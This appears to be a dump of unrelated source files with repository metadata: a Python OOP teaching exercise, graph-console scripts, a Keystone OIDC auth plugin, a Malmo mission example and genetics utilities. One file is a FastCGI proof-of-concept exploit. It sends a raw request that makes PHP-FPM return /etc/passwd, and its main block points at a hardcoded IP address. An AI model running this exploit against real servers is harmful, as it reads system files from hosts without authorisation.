[{"b": 1, "c": 2}, {"b": 2, "c": 2}]
]
}
}
}
self.utils.execute_tests(test)
| mpl-2.0 | -3,831,913,277,298,706,400 | 29.995567 | 90 | 0.263736 | false |
jameswatt2008/jameswatt2008.github.io | python/Python基础/截图和代码/加强/老王开枪/老王开枪-7-创建敌人.py | 1 | 2720 | class Person(object):
"""人的类"""
def __init__(self, name):
super(Person, self).__init__()
self.name = name
self.gun = None#用来保存枪对象的引用
self.hp = 100
def anzhuang_zidan(self, dan_jia_temp, zi_dan_temp):
"""把子弹装到弹夹中"""
#弹夹.保存子弹(子弹)
dan_jia_temp.baocun_zidan(zi_dan_temp)
def anzhuang_danjia(self, gun_temp, dan_jia_temp):
"""把弹夹安装到枪中"""
#枪.保存弹夹(弹夹)
gun_temp.baocun_danjia(dan_jia_temp)
def naqiang(self, gun_temp):
"""拿起一把枪"""
self.gun = gun_temp
def __str__(self):
if self.gun:
return "%s的血量为:%d, 他有枪 %s"%(self.name, self.hp, self.gun)
else:
return "%s的血量为%d, 他没有枪"%(self.name, self.hp)
class Gun(object):
    """Gun class"""
    def __init__(self, name):
        super(Gun, self).__init__()
        self.name = name#records the type of the gun
        self.danjia = None#records a reference to the magazine object
    def baocun_danjia(self, dan_jia_temp):
        """Use an attribute to keep a reference to this magazine object"""
        self.danjia = dan_jia_temp
    def __str__(self):
        if self.danjia:
            return "Gun info:%s, %s"%(self.name, self.danjia)
        else:
            return "Gun info:%s, this gun has no magazine"%(self.name)
class Danjia(object):
    """Magazine class"""
    def __init__(self, max_num):
        super(Danjia, self).__init__()
        self.max_num = max_num#records the maximum capacity of the magazine
        self.zidan_list = []#records references to all the bullets
    def baocun_zidan(self, zi_dan_temp):
        """Store this bullet"""
        self.zidan_list.append(zi_dan_temp)
    def __str__(self):
        return "Magazine info:%d/%d"%(len(self.zidan_list), self.max_num)
class Zidan(object):
    """Bullet class"""
    def __init__(self, sha_shang_li):
        super(Zidan, self).__init__()
        self.sha_shang_li = sha_shang_li#the damage power of this bullet
def main():
    """Controls the flow of the whole program"""
    #1. create the Lao Wang object
    laowang = Person("Lao Wang")
    #2. create a gun object
    ak47 = Gun("AK47")
    #3. create a magazine object
    dan_jia = Danjia(20)
    #4. create some bullets
    for i in range(15):
        zi_dan = Zidan(10)
        #5. Lao Wang loads the bullet into the magazine
        #Lao Wang.load_bullet_into_magazine(magazine, bullet)
        laowang.anzhuang_zidan(dan_jia, zi_dan)
    #6. Lao Wang installs the magazine into the gun
    #Lao Wang.install_magazine_into_gun(gun, magazine)
    laowang.anzhuang_danjia(ak47, dan_jia)
    #test: check the magazine info
    #print(dan_jia)
    #test: check the gun info
    #print(ak47)
    #7. Lao Wang picks up the gun
    #Lao Wang.pick_up_gun(gun)
    laowang.naqiang(ak47)
    #test: check the Lao Wang object
    print(laowang)
    #8. create an enemy
    gebi_laosong = Person("Lao Song next door")
    print(gebi_laosong)
    #9. Lao Wang shoots the enemy
if __name__ == '__main__':
main() | gpl-2.0 | 8,752,744,205,176,716,000 | 17.552632 | 60 | 0.62772 | false |
ThibaultReuille/graphiti | Scripts/console/edition.py | 1 | 5823 | import script
from script import *
class Info(script.Script):
def run(self, args):
self.console.log("{0} nodes, {1} edges.".format(og.count_nodes(), og.count_edges()))
class Load(script.Script):
def run(self, args):
if len(args) < 2:
self.console.log("Usage: {0} <filename>".format(args[0]))
return
std.load_json(" ".join(args[1:]))
class Save(script.Script):
def run(self, args):
if len(args) != 2:
self.console.log("Usage: {0} <filename>".format(args[0]))
return
if os.path.isfile(args[1]):
self.console.log("Error: File already exists!")
return
std.save_json(args[1])
self.console.log("File saved in '{0}'.".format(args[1]))
class Screenshot(script.Script):
def run(self, args):
if len(args) != 2 and len(args) != 3:
self.console.log("Usage: {0} <filename> [<factor>]".format(args[0]))
return
if os.path.isfile(args[1]):
self.console.log("Error: File {0} already exists!".format(args[1]))
return
filename = args[1]
try:
factor = float(args[2])
except:
factor = 1.0
if not filename.lower().endswith('.tga'):
self.console.log("Extension not recognized, needs to be TGA")
return
og.screenshot(filename, factor)
self.console.log("Screenshot with factor {0} saved in '{1}'.".format(factor, filename))
class Clear(script.Script):
def clear_graph(self):
for id in og.get_node_ids():
og.remove_node(id)
def clear_colors(self):
og.set_attribute("og:space:edgemode", "string", "node_color")
for n in og.get_node_ids():
og.set_node_attribute(n, "og:space:color", "vec4", "1.0 1.0 1.0 1.0")
def clear_icons(self):
for n in og.get_node_ids():
og.set_node_attribute(n, "og:space:icon", "string", "shapes/disk")
def clear_activity(self):
for n in og.get_node_ids():
og.set_node_attribute(n, "og:space:activity", "float", "0.0")
for e in og.get_edge_ids():
og.set_edge_attribute(e, "og:space:activity", "float", "0.0")
def clear_lod(self):
for n in og.get_node_ids():
og.set_node_attribute(n, "og:space:lod", "float", "1.0")
for e in og.get_edge_ids():
og.set_edge_attribute(e, "og:space:lod", "float", "1.0")
def run(self, args):
if len(args) == 2 and args[1] == "graph":
self.clear_graph()
elif len(args) == 2 and args[1] == "colors":
self.clear_colors()
elif len(args) == 2 and args[1] == "icons":
self.clear_icons()
elif len(args) == 2 and args[1] == "activity":
self.clear_activity()
elif len(args) == 2 and args[1] == "lod":
self.clear_lod()
else:
self.console.log("Usage: {0} [graph|colors|icons|activity|lod]".format(args[0]))
class Set(script.Script):
def __init__(self, console):
super(Set, self).__init__(console)
def run(self, args):
        if len(args) < 4:
self.console.log("Usage: {0} <type> <name> <value>".format(args[0]))
return
for key in self.console.query.keys():
entity_type = key[:-1] # TODO : Hack!! find a better way to do this. This removes the ending 's'
for entity_id in self.console.query[key]:
self.console.api.set_attribute(entity_type, entity_id, args[2], args[1], " ".join(args[3:]))
class Get(script.Script):
def __init__(self, console):
super(Get, self).__init__(console)
def run(self, args):
if len(args) < 2:
self.console.log("Usage: {0} <name>".format(args[0]))
return
for key in self.console.query.keys():
entity_type = key[:-1] # TODO : Hack!! find a better way to do this. This removes the ending 's'
result = dict()
for entity_id in self.console.query[key]:
result[entity_id] = self.console.api.get_attribute(entity_type, entity_id, args[1])
self.console.log("{0}: {1}".format(key, json.dumps(result)))
class Remove(script.Script):
def __init__(self, console):
super(Remove, self).__init__(console)
def run(self, args):
if 'edges' in self.console.query:
[ og.remove_edge(eid) for eid in self.console.query['edges'] ]
if 'nodes' in self.console.query:
[ og.remove_node(nid) for nid in self.console.query['nodes'] ]
class Map(script.Script):
def __init__(self, console):
super(Map, self).__init__(console)
def attr_convert(self, src_type, src_value, dst_type, options):
if src_type != dst_type:
raise Exception("Mapping from {0} to {1} not supported!".format(src_type, dst_type))
if dst_type == "vec2":
return std.vec2_to_str(src_value)
elif dst_type == "vec3":
            return std.vec3_to_str(src_value)
        elif dst_type == "vec4":
            return std.vec4_to_str(src_value)
else:
if len(options) == 2 and options[0] == "--format":
value = options[1].format(src_value)
return value
else:
return "{0}".format(src_value)
def lambda_map(self, element_type, element_id, src_type, src_name, dst_type, dst_name, options = None):
if element_type == "node":
source = og.get_node_attribute(element_id, src_name)
target = self.attr_convert(src_type, source, dst_type, options)
self.console.log("og.set_node_attribute({0}, {1}, {2}, {3})".format(element_id, dst_name, dst_type, target))
og.set_node_attribute(element_id, dst_name, dst_type, target)
elif element_type == "edge":
source = og.get_edge_attribute(element_id, src_name)
target = self.attr_convert(src_type, source, dst_type, options)
og.set_edge_attribute(element_id, dst_name, dst_type, target)
def run(self, args):
        if len(args) < 6 or args[3] != 'to':
self.console.log("Usage: {0} <src type> <src attribute> to <dst type> <dst attribute> [options]".format(args[0]))
return
if 'nodes' in self.console.query:
for nid in self.console.query['nodes']:
self.lambda_map("node", nid, args[1], args[2], args[4], args[5], args[6:])
if 'edges' in self.console.query:
for eid in self.console.query['edges']:
self.lambda_map("edge", eid, args[1], args[2], args[4], args[5], args[6:]) | bsd-2-clause | -4,776,052,747,866,240,000 | 32.471264 | 116 | 0.638502 | false |
nanshihui/PocCollect | component/fast_cgi/fast_cgi.py | 1 | 2068 | #!/usr/bin/env python
# encoding: utf-8
from t import T
import socket
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
timeout=3
result = {}
result['result']=False
target_url='http://'+ip+':'+port
socket.setdefaulttimeout(timeout)
client_socket=None
        # Check whether the target leaks local file contents
try:
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ip, 9000))
data = """
01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
"""
data_s = ''
for _ in data.split():
data_s += chr(int(_, 16))
client_socket.send(data_s)
ret = client_socket.recv(1024)
if ret.find(':root:') > 0:
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='fast-cgi Vulnerability'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=data_s
result['VerifyInfo']['result'] =ret
except:
pass
finally:
if client_socket is not None:
client_socket.close()
return result
if __name__ == '__main__':
print P().verify(ip='58.220.22.101',port='80') | mit | 5,356,842,197,419,762,000 | 28.414286 | 93 | 0.499514 | false |
klmitch/python-keystoneclient | keystoneclient/contrib/auth/v3/oidc.py | 1 | 8795 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from positional import positional
from keystoneclient import access
from keystoneclient.auth.identity.v3 import federated
class OidcPassword(federated.FederatedBaseAuth):
"""Implement authentication plugin for OpenID Connect protocol.
OIDC or OpenID Connect is a protocol for federated authentication.
The OpenID Connect specification can be found at::
``http://openid.net/specs/openid-connect-core-1_0.html``
"""
@classmethod
def get_options(cls):
options = super(OidcPassword, cls).get_options()
options.extend([
cfg.StrOpt('username', help='Username'),
cfg.StrOpt('password', secret=True, help='Password'),
cfg.StrOpt('client-id', help='OAuth 2.0 Client ID'),
cfg.StrOpt('client-secret', secret=True,
help='OAuth 2.0 Client Secret'),
cfg.StrOpt('access-token-endpoint',
help='OpenID Connect Provider Token Endpoint'),
cfg.StrOpt('scope', default="profile",
help='OpenID Connect scope that is requested from OP')
])
return options
@positional(4)
def __init__(self, auth_url, identity_provider, protocol,
username, password, client_id, client_secret,
access_token_endpoint, scope='profile',
grant_type='password'):
"""The OpenID Connect plugin expects the following:
:param auth_url: URL of the Identity Service
:type auth_url: string
:param identity_provider: Name of the Identity Provider the client
will authenticate against
:type identity_provider: string
:param protocol: Protocol name as configured in keystone
:type protocol: string
:param username: Username used to authenticate
:type username: string
:param password: Password used to authenticate
:type password: string
:param client_id: OAuth 2.0 Client ID
:type client_id: string
:param client_secret: OAuth 2.0 Client Secret
:type client_secret: string
:param access_token_endpoint: OpenID Connect Provider Token Endpoint,
for example:
https://localhost:8020/oidc/OP/token
:type access_token_endpoint: string
:param scope: OpenID Connect scope that is requested from OP,
defaults to "profile", for example: "profile email"
:type scope: string
:param grant_type: OpenID Connect grant type, it represents the flow
that is used to talk to the OP. Valid values are:
"authorization_code", "refresh_token", or
"password".
:type grant_type: string
"""
super(OidcPassword, self).__init__(auth_url, identity_provider,
protocol)
self._username = username
self._password = password
self.client_id = client_id
self.client_secret = client_secret
self.access_token_endpoint = access_token_endpoint
self.scope = scope
self.grant_type = grant_type
@property
def username(self):
# Override to remove deprecation.
return self._username
@username.setter
def username(self, value):
# Override to remove deprecation.
self._username = value
@property
def password(self):
# Override to remove deprecation.
return self._password
@password.setter
def password(self, value):
# Override to remove deprecation.
self._password = value
def get_unscoped_auth_ref(self, session):
"""Authenticate with OpenID Connect and get back claims.
        This is a multi-step process. First, an access token must be
        retrieved; to do this, the username and password, the OpenID Connect
        client ID and secret, and the access token endpoint must be known.
        Second, the access token is exchanged by accessing the protected
        Keystone endpoint (the federated auth URL). This triggers the OpenID
        Connect Provider to perform user introspection and to retrieve
        information (specified in the scope) about the user in the form of
        an OpenID Connect claim. These claims are sent to Keystone as
        environment variables.
:param session: a session object to send out HTTP requests.
:type session: keystoneclient.session.Session
:returns: a token data representation
:rtype: :py:class:`keystoneclient.access.AccessInfo`
"""
# get an access token
client_auth = (self.client_id, self.client_secret)
payload = {'grant_type': self.grant_type, 'username': self.username,
'password': self.password, 'scope': self.scope}
response = self._get_access_token(session, client_auth, payload,
self.access_token_endpoint)
access_token = response.json()['access_token']
# use access token against protected URL
headers = {'Authorization': 'Bearer ' + access_token}
response = self._get_keystone_token(session, headers,
self.federated_token_url)
# grab the unscoped token
token = response.headers['X-Subject-Token']
token_json = response.json()['token']
return access.AccessInfoV3(token, **token_json)
def _get_access_token(self, session, client_auth, payload,
access_token_endpoint):
"""Exchange a variety of user supplied values for an access token.
:param session: a session object to send out HTTP requests.
:type session: keystoneclient.session.Session
:param client_auth: a tuple representing client id and secret
:type client_auth: tuple
:param payload: a dict containing various OpenID Connect values, for
example::
{'grant_type': 'password', 'username': self.username,
'password': self.password, 'scope': self.scope}
:type payload: dict
:param access_token_endpoint: URL to use to get an access token, for
example: https://localhost/oidc/token
:type access_token_endpoint: string
"""
op_response = session.post(self.access_token_endpoint,
requests_auth=client_auth,
data=payload,
authenticated=False)
return op_response
def _get_keystone_token(self, session, headers, federated_token_url):
"""Exchange an acess token for a keystone token.
By Sending the access token in an `Authorization: Bearer` header, to
an OpenID Connect protected endpoint (Federated Token URL). The
OpenID Connect server will use the access token to look up information
about the authenticated user (this technique is called instrospection).
The output of the instrospection will be an OpenID Connect Claim, that
will be used against the mapping engine. Should the mapping engine
succeed, a Keystone token will be presented to the user.
:param session: a session object to send out HTTP requests.
:type session: keystoneclient.session.Session
:param headers: an Authorization header containing the access token.
        :type headers: dict
        :param federated_token_url: Protected URL for federated authentication,
                                    for example: https://localhost:5000/v3/\
                                    OS-FEDERATION/identity_providers/bluepages/\
                                    protocols/oidc/auth
        :type federated_token_url: string
"""
auth_response = session.post(self.federated_token_url,
headers=headers,
authenticated=False)
return auth_response
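# --- Usage sketch (illustrative only; every URL and credential below is a
# made-up placeholder, not a value from a real deployment) ---
# Constructing the plugin needs no network access; authentication itself is
# normally driven through a keystoneclient session, which calls
# get_unscoped_auth_ref() the first time a token is required.
if __name__ == '__main__':
    auth = OidcPassword(
        'https://keystone.example.org:5000/v3',
        identity_provider='myidp',
        protocol='oidc',
        username='demo',
        password='secret',
        client_id='keystone-client',
        client_secret='client-secret',
        access_token_endpoint='https://idp.example.org/oidc/token')
    # The protected federation URL is derived from auth_url, identity_provider
    # and protocol; this is the endpoint the access token is exchanged against.
    print(auth.federated_token_url)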
| apache-2.0 | -3,890,712,068,428,765 | 40.880952 | 79 | 0.61444 | false |
Yarichi/Proyecto-DASI | Malmo/Python_Examples/mission_quit_command_example.py | 1 | 4421 | # ------------------------------------------------------------------------------------------------
# Copyright (c) 2016 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ------------------------------------------------------------------------------------------------
# Quit command example
import MalmoPython
import os
import sys
import time
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) # flush print output immediately
missionXML='''<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<Mission xmlns="http://ProjectMalmo.microsoft.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<About>
<Summary>If at first you don't succeed, give up.</Summary>
</About>
<ServerSection>
<ServerHandlers>
<FlatWorldGenerator generatorString="3;7,220*1,5*3,2;3;,biome_1"/>
<ServerQuitFromTimeUp timeLimitMs="30000"/>
<ServerQuitWhenAnyAgentFinishes/>
</ServerHandlers>
</ServerSection>
<AgentSection mode="Survival">
<Name>QuitBot</Name>
<AgentStart/>
<AgentHandlers>
<ObservationFromFullStats/>
<ContinuousMovementCommands turnSpeedDegs="180"/>
<ChatCommands />
<MissionQuitCommands quitDescription="give_up"/>
<RewardForMissionEnd>
<Reward description="give_up" reward="-1000"/>
</RewardForMissionEnd>
</AgentHandlers>
</AgentSection>
</Mission>'''
# Create default Malmo objects:
agent_host = MalmoPython.AgentHost()
try:
agent_host.parse( sys.argv )
except RuntimeError as e:
print 'ERROR:',e
print agent_host.getUsage()
exit(1)
if agent_host.receivedArgument("help"):
print agent_host.getUsage()
exit(0)
my_mission = MalmoPython.MissionSpec(missionXML, True)
my_mission_record = MalmoPython.MissionRecordSpec()
# Attempt to start a mission:
max_retries = 3
for retry in range(max_retries):
try:
agent_host.startMission( my_mission, my_mission_record )
break
except RuntimeError as e:
if retry == max_retries - 1:
print "Error starting mission:",e
exit(1)
else:
time.sleep(2)
# Loop until mission starts:
print "Waiting for the mission to start ",
world_state = agent_host.getWorldState()
while not world_state.has_mission_begun:
sys.stdout.write(".")
time.sleep(0.1)
world_state = agent_host.getWorldState()
for error in world_state.errors:
print "Error:",error.text
print
print "Mission running ",
count = 0
# Loop until mission ends:
while world_state.is_mission_running:
sys.stdout.write(".")
time.sleep(0.5)
if count == 10:
print
print "Giving up!"
agent_host.sendCommand("quit")
count += 1
world_state = agent_host.getWorldState()
for error in world_state.errors:
print "Error:",error.text
for reward in world_state.rewards:
print "Reward:",reward.getValue()
print
print "Mission ended"
# Mission has ended.
| gpl-2.0 | -3,410,355,032,639,231,500 | 35.151261 | 117 | 0.598055 | false |
ema/conpaas | conpaas-services/src/conpaas/services/htc/manager/configuration.py | 1 | 4786 | '''
Created on Jul 23, 2013
@author: Vlad
'''
import random
class Configuration:
def __init__(self,types_list, cost_list, limit_list):
self.keys = dict(zip(types_list, range(len(types_list))))
        self.averages = {} # average task duration, keyed by machine-type index
        self.rav = {} # average task duration scaled by machine size, keyed by machine-type index
        self.notasks = {} # number of tasks observed, keyed by machine-type index
        self.throughput = {} # tasks completed per relevant time unit, keyed by machine-type index
self.conf = {}
self.costs = dict(zip(types_list,cost_list))
self.limits = dict(zip(types_list,limit_list))
self.ratios={}
for k in self.keys:
self.costs[self.keys[k]]=self.costs[k]
del self.costs[k]
self.limits[self.keys[k]]=self.limits[k]
del self.limits[k]
self.notasks[self.keys[k]] = 0
self.averages[self.keys[k]] = 0
self.rav[self.keys[k]] = 0
self.conf[self.keys[k]]= 0
random.seed()
self.conf_dict = {}
self.m = {}
def relevant_time_unit(self):
rk = random.choice(self.averages.keys())
t=60
self.throughput[rk] = round(t / self.averages[rk])
self.unit = t
for k in self.costs:
self.costs[k] *= float(self.unit)/3600
self.compute_throughput()
return self.unit
def compute_throughput(self):
for k in self.averages:
self.throughput[k] = round(self.unit / self.rav[k])
def set_average(self,m_type,value, count):
if self.keys[m_type] in self.averages.keys():
self.averages[self.keys[m_type]]=value
self.notasks[self.keys[m_type]] +=count
if m_type=='small':
self.rav[self.keys[m_type]]= value
if m_type=='medium':
self.rav[self.keys[m_type]]= value/4
if m_type=='large':
self.rav[self.keys[m_type]] = value/8
def compute_ratios(self):
for k in self.costs:
self.ratios[k] = round(self.costs[k]/self.throughput[k], 5 )
def compute_tmax(self):
tmax = 0
for k in self.throughput:
tmax += self.limits[k]*self.throughput[k]
return tmax
def cost_conf(self):
c = 0
for k in self.costs:
c += self.conf[k]*self.costs[k]
return c
def cheap_check(self,start,target):
cheap_list = self.costs.values()
sorted_list = sorted(self.costs.values())
cheap = 0
for p in sorted_list:
kp = cheap_list.index(p)
if start + self.throughput[kp] > target and kp in self.ratios.keys() :
self.conf[kp]+=1
cheap=1
break
return cheap
def compute_configuration(self, target):
for k in self.averages:
self.conf[k]= 0
self.compute_ratios()
start = 0
while start < target and len(self.ratios)>0:
if self.cheap_check(start, target) ==1:
return self.conf
r = self.ratios.values()
m = min(r)
for km in self.ratios:
if self.ratios[km] == m:
break
while self.limits[km] > self.conf[km]:
start+=self.throughput[km]
self.conf[km]+=1
if start >= target:
return self.conf
if self.cheap_check(start, target) == 1:
return self.conf
del self.ratios[km]
return self.conf
def dynamic_configuration(self):
tmax = self.compute_tmax()
for k in self.limits:
self.conf[k]=self.limits[k]
t = tmax - 1
self.conf_dict = {}
self.conf_dict[tmax] = self.conf
self.m = {}
self.m[tmax] = self.cost_conf()
while t >= 0:
self.m[t]=self.m[t+1]
km = -1
for k in self.throughput:
if tmax - self.throughput[k] >= t:
if self.m[t] > self.m[t+self.throughput[k]] - self.costs[k] and self.conf_dict[t+self.throughput[k]][k]>0:
self.m[t] = self.m[t+self.throughput[k]] - self.costs[k]
km = k
if km > -1:
self.conf_dict[t] = self.conf_dict[t+self.throughput[km]].copy()
self.conf_dict[t][km] -= 1
else:
self.conf_dict[t] = self.conf_dict[t+1].copy()
t-=1
self.m[0]=0
return self.m
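# --- Usage sketch (illustrative only; the costs, limits and task times below
# are made-up numbers, not values from any real deployment) ---
# The manager is expected to seed the per-type task averages, derive the
# relevant time unit, then ask for a machine configuration that reaches a
# target throughput. Note that set_average() only scales the literal type
# names 'small', 'medium' and 'large'.
if __name__ == '__main__':
    c = Configuration(['small', 'medium', 'large'],  # machine types
                      [0.12, 0.48, 0.96],            # cost per hour per type
                      [10, 5, 2])                    # max instances per type
    for machine_type in ['small', 'medium', 'large']:
        c.set_average(machine_type, 30.0, 100)  # 30 s per task, 100 tasks seen
    c.relevant_time_unit()                # fixes the scheduling time unit
    print(c.compute_configuration(40))    # instances per type for 40 tasks/unit
    print(c.cost_conf())                  # cost of that configuration per unit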
| bsd-3-clause | -8,171,769,272,402,431,000 | 32.236111 | 126 | 0.494985 | false |
omerwe/LEAP | leapUtils.py | 1 | 10998 | import numpy as np
from optparse import OptionParser
import scipy.linalg as la
import scipy.stats as stats
import scipy.linalg.blas as blas
import pandas as pd
import csv
import time
import fastlmm.util.VertexCut as vc
from pysnptools.snpreader.bed import Bed
import pysnptools.util as pstutil
import pysnptools.util.pheno as phenoUtils
np.set_printoptions(precision=3, linewidth=200)
def loadData(bfile, extractSim, phenoFile, missingPhenotype='-9', loadSNPs=False, standardize=True):
bed = Bed(bfile, count_A1=True)
if (extractSim is not None):
f = open(extractSim)
csvReader = csv.reader(f)
extractSnpsSet = set([])
for l in csvReader: extractSnpsSet.add(l[0])
f.close()
keepSnpsInds = [i for i in range(bed.sid.shape[0]) if bed.sid[i] in extractSnpsSet]
bed = bed[:, keepSnpsInds]
phe = None
if (phenoFile is not None): bed, phe = loadPheno(bed, phenoFile, missingPhenotype)
if (loadSNPs):
bed = bed.read()
if (standardize): bed = bed.standardize()
return bed, phe
def loadPheno(bed, phenoFile, missingPhenotype='-9', keepDict=False):
pheno = phenoUtils.loadOnePhen(phenoFile, missing=missingPhenotype, vectorize=True)
checkIntersection(bed, pheno, 'phenotypes')
bed, pheno = pstutil.intersect_apply([bed, pheno])
if (not keepDict): pheno = pheno['vals']
return bed, pheno
def checkIntersection(bed, fileDict, fileStr, checkSuperSet=False):
bedSet = set((b[0], b[1]) for b in bed.iid)
fileSet = set((b[0], b[1]) for b in fileDict['iid'])
if checkSuperSet:
if (not fileSet.issuperset(bedSet)): raise Exception(fileStr + " file does not include all individuals in the bfile")
intersectSet = bedSet.intersection(fileSet)
if (len(intersectSet) != len (bedSet)):
print(len(intersectSet), 'individuals appear in both the plink file and the', fileStr, 'file')
def symmetrize(a):
return a + a.T - np.diag(a.diagonal())
def loadRelatedFile(bed, relFile):
relatedDict = phenoUtils.loadOnePhen(relFile, vectorize=True)
checkIntersection(bed, relatedDict, 'relatedness', checkSuperSet=True)
_, relatedDict = pstutil.intersect_apply([bed, relatedDict])
related = relatedDict['vals']
keepArr = (related < 0.5)
print(np.sum(~keepArr), 'individuals will be removed due to high relatedness')
return keepArr
def findRelated(bed, cutoff, kinshipFile=None):
if (kinshipFile is None):
print('Computing kinship matrix...')
t0 = time.time()
XXT = symmetrize(blas.dsyrk(1.0, bed.val, lower=1) / bed.val.shape[1])
print('Done in %0.2f'%(time.time()-t0), 'seconds')
else:
XXT = np.loadtxt(kinshipFile)
#Find related individuals
removeSet = set(np.sort(vc.VertexCut().work(XXT, cutoff))) #These are the indexes of the IIDs to remove
print('Marking', len(removeSet), 'individuals to be removed due to high relatedness')
#keepArr = np.array([(1 if iid in keepSet else 0) for iid in bed.iid], dtype=bool)
keepArr = np.ones(bed.iid.shape[0], dtype=bool)
for i in removeSet: keepArr[i] = False
return keepArr
def eigenDecompose(XXT, ignore_neig=False):
t0 = time.time()
print('Computing eigendecomposition...')
s,U = la.eigh(XXT)
if (not ignore_neig and (np.min(s) < -1e-4)): raise Exception('Negative eigenvalues found')
s[s<0]=0
ind = np.argsort(s)
ind = ind[s>1e-12]
U = U[:, ind]
s = s[ind]
print('Done in %0.2f'%(time.time()-t0), 'seconds')
return s,U
def loadCovars(bed, covarFile):
covarsDict = phenoUtils.loadPhen(covarFile)
checkIntersection(bed, covarsDict, 'covariates', checkSuperSet=True)
_, covarsDict = pstutil.intersect_apply([bed, covarsDict])
covar = covarsDict['vals']
return covar
def getSNPCovarsMatrix(bed, resfile, pthresh, mindist):
snpNameToNumDict = dict([])
for i,s in enumerate(bed.sid): snpNameToNumDict[s] = i
f = open(resfile)
csvReader = csv.reader(f, delimiter="\t")
next(csvReader)
significantSNPs = []
significantSNPNames = []
lastPval = 0
featuresPosList = []
for l in csvReader:
snpName, pVal = l[0], float(l[4])
if (pVal < lastPval): raise Exception('P-values are not sorted in descending order: ' + str(pVal) + ">" + str(lastPval))
lastPval = pVal
if (pVal > pthresh): break
if (snpName not in snpNameToNumDict): continue
significantSNPNames.append(snpName)
if (mindist == 0):
significantSNPs.append(snpNameToNumDict[snpName])
print('Using SNP', snpName, 'with p<%0.2e'%pVal, 'as a fixed effect')
else:
posArr = bed.pos[snpNameToNumDict[snpName]]
chrom, pos = posArr[0], int(posArr[2])
addSNP = True
for (c,p) in featuresPosList:
if (chrom == c and abs(pos-p) < mindist):
addSNP = False
break
if addSNP:
significantSNPs.append(snpNameToNumDict[snpName])
featuresPosList.append((chrom, pos))
print('Using SNP', snpName, '('+str(int(chrom))+':'+str(pos)+') with p<%0.2e'%pVal, 'as a fixed effect')
f.close()
snpCovarsMat = bed.val[:, significantSNPs]
return snpCovarsMat
def getExcludedChromosome(bfile, chrom):
bed = Bed(bfile, count_A1=True)
indsToKeep = (bed.pos[:,0] != chrom)
bed = bed[:, indsToKeep]
return bed.read().standardize()
def getChromosome(bfile, chrom):
bed = Bed(bfile, count_A1=True)
indsToKeep = (bed.pos[:,0] == chrom)
bed = bed[:, indsToKeep]
return bed.read().standardize()
def _fixupBedAndPheno(bed, pheno, missingPhenotype='-9'):
bed = _fixupBed(bed)
bed, pheno = _fixup_pheno(pheno, bed, missingPhenotype)
return bed, pheno
def _fixupBed(bed):
if isinstance(bed, str):
return Bed(bed, count_A1=True).read().standardize()
else: return bed
def _fixup_pheno(pheno, bed=None, missingPhenotype='-9'):
if (isinstance(pheno, str)):
if (bed is not None):
bed, pheno = loadPheno(bed, pheno, missingPhenotype, keepDict=True)
return bed, pheno
else:
phenoDict = phenoUtils.loadOnePhen(pheno, missing=missingPhenotype, vectorize=True)
return phenoDict
else:
if (bed is not None): return bed, pheno
else: return pheno
def linreg(bed, pheno):
#Extract snps and phenotype
bed, pheno = _fixupBedAndPheno(bed, pheno)
if isinstance(pheno, dict): phe = pheno['vals']
else: phe = pheno
if (len(phe.shape)==2):
if (phe.shape[1]==1): phe=phe[:,0]
else: raise Exception('More than one phenotype found')
#Normalize y. We assume X is already normalized.
y = phe - phe.mean(); y /= y.std()
#Compute p-values
Xy = bed.val.T.dot(y) / y.shape[0]
Xy[Xy>1.0] = 1.0
Xy[Xy<-1.0] = -1.0
df = y.shape[0]-2
TINY = 1.0e-20
t = Xy * np.sqrt(df / ((1.0-Xy+TINY) * (1.0+Xy+TINY)))
pValT = stats.t.sf(np.abs(t), df)*2
#Create pandas data frame
items = [
('SNP', bed.sid),
('Chr', bed.pos[:,0]),
('GenDist', bed.pos[:,1]),
('ChrPos', bed.pos[:,2]),
('PValue', pValT),
]
frame = pd.DataFrame.from_items(items)
frame.sort("PValue", inplace=True)
frame.index = np.arange(len(frame))
return frame
def powerPlot(df, causalSNPs, title=''):
import pylab
